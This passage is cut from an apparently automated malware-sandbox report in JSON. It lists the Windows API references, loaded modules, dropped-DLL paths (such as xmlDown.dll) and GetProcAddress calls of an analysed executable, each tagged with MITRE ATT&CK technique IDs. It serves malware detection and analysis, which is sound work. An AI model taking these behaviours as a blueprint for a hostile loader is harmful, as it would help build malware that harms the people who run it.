\"00000000-00005684.00000000.66308.00240000.00000004.mdmp, 00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00240000.00000004.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetWriteWatch\"; Source: \"00000000-00005684.00000000.66308.00240000.00000004.mdmp, 00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00240000.00000004.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetCommTimeouts\"; Source: \"00000000-00005684.00000000.66308.00240000.00000004.mdmp, 00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00240000.00000004.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetWindowsDirectoryW\"; Source: \"00000000-00005684.00000000.66308.00240000.00000004.mdmp, 00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00240000.00000004.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"FindNextFileW\"; Source: \"00000000-00005684.00000000.66308.00240000.00000004.mdmp, 00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00240000.00000004.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetSystemPowerStatus\"; Source: \"00000000-00005684.00000000.66308.00240000.00000004.mdmp, 00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00240000.00000004.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"FindNextVolumeW\"; Source: \"00000000-00005684.00000000.66308.00240000.00000004.mdmp, 00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00240000.00000004.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetEnvironmentVariableA\"; Source: \"00000000-00005684.00000000.66308.00240000.00000004.mdmp, 00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00240000.00000004.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetQueuedCompletionStatus\"; Source: \"00000000-00005684.00000000.66308.00240000.00000004.mdmp, 00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00240000.00000004.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"FileTimeToSystemTime\"; Source: \"00000000-00005684.00000000.66308.00240000.00000004.mdmp, 00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00240000.00000004.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetStartupInfoA\"; Source: \"00000000-00005684.00000000.66308.00240000.00000004.mdmp, 00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00240000.00000004.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"EnumCalendarInfoExA\"; Source: \"00000000-00005684.00000000.66308.00240000.00000004.mdmp, 00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00240000.00000004.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetProcessAffinityMask\"; Source: \"00000000-00005684.00000000.66308.00240000.00000004.mdmp, 00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00240000.00000004.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetNamedPipeInfo\"; Source: \"00000000-00005684.00000000.66308.00240000.00000004.mdmp, 00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00240000.00000004.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"EnumDateFormatsExA\"; Source: \"00000000-00005684.00000000.66308.00240000.00000004.mdmp, 00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00240000.00000004.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"FormatMessageA\"; Source: \"00000000-00005684.00000000.66308.00240000.00000004.mdmp, 00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00240000.00000004.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetVersion\"; Source: \"00000000-00005684.00000000.66308.00240000.00000004.mdmp, 00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00240000.00000004.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetWindowsDirectoryA\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetSystemDirectoryA\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"WinExec\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"DeleteCriticalSection\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"LeaveCriticalSection\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"EnterCriticalSection\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"InitializeCriticalSection\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"VirtualFree\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"VirtualAlloc\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"LocalFree\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"LocalAlloc\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetCurrentThreadId\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetThreadLocale\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetModuleFileNameA\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetLocaleInfoA\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetCommandLineA\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"FreeLibrary\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"WriteFile\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"UnhandledExceptionFilter\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"RtlUnwind\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"RaiseException\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetStdHandle\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetKeyboardType\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"CharNextA\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"RegQueryValueExA\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"RegOpenKeyExA\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"RegCloseKey\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"TlsSetValue\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"TlsGetValue\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"UnmapViewOfFile\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"SizeofResource\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"SetFilePointer\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"SetFileAttributesA\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"SetEndOfFile\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"ReadFile\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"OpenMutexA\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"MapViewOfFile\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"LockResource\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"LoadResource\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GlobalFindAtomA\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"FreeResource\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"FindResourceA\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"FindFirstFileA\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"FindClose\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"FileTimeToLocalFileTime\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"FileTimeToDosDateTime\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"CreateMutexA\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"CreateFileMappingA\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"CopyFileA\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"CloseHandle\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"PostMessageA\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetMessageA\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GlobalHandle\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetStringTypeExA\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetStartupInfoW\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetSystemTime\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetNumberFormatA\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetTimeFormatW\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"GetLocalTime\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"VirtualProtect\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"EnumProcessModules\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API (Indicator: \"wsprintfA\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-625", "type": 2, "relevance": 1, "name": "References Windows filepaths for DLLs (possible dropped files)", "description": "Observed system executable string:\"%WINDIR%\\system32\\uxtheme.dll\" [Source: 00000000-00005684-00000C28-61737556]\n Observed system executable string:\"%WINDIR%\\Debug\\xmlDown.dll\" [Source: 00000000-00005684-00000C28-61860331]", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-170", "type": 2, "relevance": 1, "name": "Possibly uses system binaries (Windows LOLbins)", "description": "Observed system executable string:\"%WINDIR%\\system32\\xmloder.exe\" [Source: 00000000-00005684-00000C39-3015284569]", "origin": "File/Memory"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-550", "type": 2, "relevance": 1, "name": "Contains ability to find and load resources of specific modules (API string)", "description": "Found reference to API \"SizeofResource\" (Indicator: \"SizeofResource\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API \"LockResource\" (Indicator: \"LockResource\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API \"LoadResource\" (Indicator: \"LoadResource\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API \"FreeResource\" (Indicator: \"FreeResource\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")\n Found reference to API \"FindResourceA\" (Indicator: \"FindResource\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-206", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the command-line string for the current process (API string)", "description": "Found reference to API \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00005684.00000000.66308.00401000.00000040.mdmp, 00000000-00005684.00000001.66967.00401000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" loaded module \"USER32.DLL\" at base 75bc0000\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" loaded module \"KERNEL32.DLL\" at base 775e0000\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" loaded module \"ADVAPI32.DLL\" at base 777f0000\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" loaded module \"PSAPI.DLL\" at base 768e0000\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" loaded module \"OLEAUT32.DLL\" at base 77000000\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" loaded module \"GDI32.DLL\" at base 77b10000\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" loaded module \"WSOCK32.DLL\" at base 70050000\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" loaded module \"OLE32.DLL\" at base 76a60000\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" loaded module \"CRYPTBASE.DLL\" at base 75740000\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74600000\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" loaded module \"%WINDIR%\\DEBUG\\XMLDOWN.DLL\" at base 3c0000\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 756f0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"LoadLibrary\" with a parameter KERNEL32.DLL (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"LoadLibrary\" with a parameter PSAPI.DLL (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"LoadLibrary\" with a parameter user32.dll (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"LoadLibrary\" with a parameter oleaut32.dll (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"LoadLibrary\" with a parameter wsock32.dll (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Debug\\xmlDown.ENU (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Debug\\xmlDown.EN (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Debug\\xmlDown.dll (UID: 00000000-00005684)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter EnumProcessModules (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter wsprintfA (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter FindClose (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter FindNextFileA (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter FindFirstFileA (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter FlushFileBuffers (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter IsBadReadPtr (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter MoveFileA (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter SetFileAttributesA (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryA (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter GetWindowsDirectoryA (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter CreateEventA (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter OpenEventA (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter GetACP (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter CopyFileA (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter DeviceIoControl (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter OpenProcess (UID: 00000000-00005684)\n \"070e719b0b9b5027c8629b058868f8faa6d224cdc4fed3f2e11041ff677aafa1.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00005684)\n 